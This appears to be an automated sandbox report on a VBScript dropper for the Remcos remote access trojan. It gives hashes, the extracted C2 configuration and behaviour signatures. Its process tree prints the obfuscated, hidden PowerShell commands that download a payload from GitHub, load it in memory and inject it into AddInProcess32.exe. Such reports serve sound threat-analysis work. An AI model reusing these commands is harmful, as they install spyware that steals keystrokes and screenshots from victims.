Analysis
-
max time kernel
149s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 01:29
Static task
static1
Behavioral task
behavioral1
Sample
asegurar.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
asegurar.vbs
Resource
win10v2004-20240802-en
General
-
Target
asegurar.vbs
-
Size
486KB
-
MD5
fdcf96cf3407c66f4943f2253b16af72
-
SHA1
e8d416d183f29e63e5938363b3a234b20b8ea107
-
SHA256
96c7c3c8df1b8ddd33de8331f5f636c5bc7d0695b5d6cf22021c31d16f6f305f
-
SHA512
b03dcde70b44ac7b6ec4c57e52f2e0b6be96362c50881953fcf05240e704b11adca440926a2bcc7d1d494ee4b8ffd527753982eb090a05f1ccbad009506802e8
-
SSDEEP
12288:1BBQ2qtiJpZBdlB55pXRhDEBJ1bsXq8OnO5YWgVAjDcGS+e0W/5fyxJfd7ieMboV:5q+R2IUEF/N
Malware Config
Extracted
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Extracted
remcos
Matrix Fenix*
newssssssssssssss.duckdns.org:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XDNGQ0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 11 4512 powershell.exe 20 4512 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1116 powershell.exe 4512 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 raw.githubusercontent.com 8 raw.githubusercontent.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4512 set thread context of 1852 4512 powershell.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1116 powershell.exe 1116 powershell.exe 4512 powershell.exe 4512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1852 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1136 wrote to memory of 1116 1136 WScript.exe 89 PID 1136 wrote to memory of 1116 1136 WScript.exe 89 PID 1116 wrote to memory of 4512 1116 powershell.exe 91 PID 1116 wrote to memory of 4512 1116 powershell.exe 91 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92 PID 4512 wrote to memory of 1852 4512 powershell.exe 92
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegurar.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzaE9NZVs0XSskcFNIT21FWzM0XSsnWCcpKCgoJ3snKycyfXUnKydyJysnbCAnKyc9ICcrJ3snKycwJysnfScrJ2gnKyd0JysndHAnKydzOicrJy8nKycvcicrJ2F3LicrJ2dpdGgnKyd1YicrJ3VzZXJjb250JysnZW50LmMnKydvbS9ObycrJ0RldGUnKydjdE9uL05vRGV0ZScrJ2N0TycrJ24vJysncmVmcy8nKydoJysnZScrJ2Fkcy8nKydtYWknKyduLycrJ0QnKydldCcrJ2FoTm90JysnaC1WLnR4dHswJysnfTsgeycrJzJ9YmEnKydzZTYnKyc0Q28nKydudGVudCAnKyc9IChOZXctT2JqZScrJ2N0ICcrJ1MnKyd5Jysnc3QnKydlbS5OZXQnKycuV2ViQ2xpZScrJ250KS5Eb3duJysnbG9hZFN0cmknKyduZyh7Mn0nKyd1cmwpOycrJyAnKyd7Mn1iaScrJ24nKydhcicrJ3lDbycrJ250ZScrJ250ICcrJz0gW1N5cycrJ3QnKydlbS5DbycrJ252ZXJ0JysnXTo6RnJvbUJhc2UnKyc2JysnNFMnKyd0JysncicrJ2knKyduZycrJyh7Mn0nKydiYXNlNicrJzQnKydDbycrJ250ZW4nKyd0KTsgezInKyd9YXNzZW1ibHkgPSAnKydbJysnUicrJ2VmbGVjdGlvbicrJy5Bc3NlJysnbWInKydseV06OicrJ0xvJysnYWQnKycoezJ9YmluYXInKyd5QycrJ29udGVudCcrJyk7IFsnKydkbicrJ2wnKydpYi5JJysnTy5Ib20nKydlJysnXTo6VkFJKHsxfTAnKycvZTJpJysnbUInKycvJysnZC9lZS5ldCcrJ3NhcC8vJysnOicrJ3MnKydwJysndCcrJ3QnKydoezF9LCcrJyB7MX1kJysnZXNhdCcrJ2l2JysnYWRvJysnezF9JysnLCB7MX0nKydkZScrJ3NhdGl2JysnYWRvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWQnKydvezF9LCcrJyB7MX1BJysnZGRJblByb2NlcycrJ3MzMnsxfScrJywgJysnezF9JysneycrJzEnKyd9LCcrJ3sxfXsxfSknKSAtRiAgW2NIYXJdMzksW2NIYXJdMzQsW2NIYXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PshOMe[4]+$pSHOmE[34]+'X')((('{'+'2}u'+'r'+'l '+'= '+'{'+'0'+'}'+'h'+'t'+'tp'+'s:'+'/'+'/r'+'aw.'+'gith'+'ub'+'usercont'+'ent.c'+'om/No'+'Dete'+'ctOn/NoDete'+'ctO'+'n/'+'refs/'+'h'+'e'+'ads/'+'mai'+'n/'+'D'+'et'+'ahNot'+'h-V.txt{0'+'}; {'+'2}ba'+'se6'+'4Co'+'ntent '+'= (New-Obje'+'ct '+'S'+'y'+'st'+'em.Net'+'.WebClie'+'nt).Down'+'loadStri'+'ng({2}'+'url);'+' '+'{2}bi'+'n'+'ar'+'yCo'+'nte'+'nt '+'= [Sys'+'t'+'em.Co'+'nvert'+']::FromBase'+'6'+'4S'+'t'+'r'+'i'+'ng'+'({2}'+'base6'+'4'+'Co'+'nten'+'t); {2'+'}assembly = '+'['+'R'+'eflection'+'.Asse'+'mb'+'ly]::'+'Lo'+'ad'+'({2}binar'+'yC'+'ontent'+'); ['+'dn'+'l'+'ib.I'+'O.Hom'+'e'+']::VAI({1}0'+'/e2i'+'mB'+'/'+'d/ee.et'+'sap//'+':'+'s'+'p'+'t'+'t'+'h{1},'+' {1}d'+'esat'+'iv'+'ado'+'{1}'+', {1}'+'de'+'sativ'+'ado{1}, {1}des'+'at'+'i'+'vad'+'o{1},'+' {1}A'+'ddInProces'+'s32{1}'+', '+'{1}'+'{'+'1'+'},'+'{1}{1})') -F [cHar]39,[cHar]34,[cHar]36) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1852
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4280,i,10065386245627775856,6567048529106473151,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:81⤵PID:3340
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5a379f7bff2819ff6fc5a71cebaf187e7
SHA1098ef52b77eb16c8d121b0dbeeff6e87e792b2df
SHA2562ebe0fda7437224882c7382eed94c355a5b6539bb1088c108ab40a088fabade6
SHA512fc91641d3ffe7f56f94973b8c997d73a81daf1689fb46cacfc85b755f8542cd22fcf2b41ebbdbd497cae5b5cd3d1e981d3bd45c70219ca866a136f3bc4cbcb88
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD543e8c4389029c09460de3614d7f5897d
SHA1f3f0860e6bb1760d5541904860ab76b87decca80
SHA256c5bc7915f69e9ee0f8519e92b7ca34518b61684bfbf91a81fe62fd02b1020c02
SHA5127560063d6a221bae2dcaeea79397a6af8d01c899ec88e5e1bb980568876a0f83eac4a7d65c289021408b0f1d187f4b4088121957f394019751e545b425741534
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82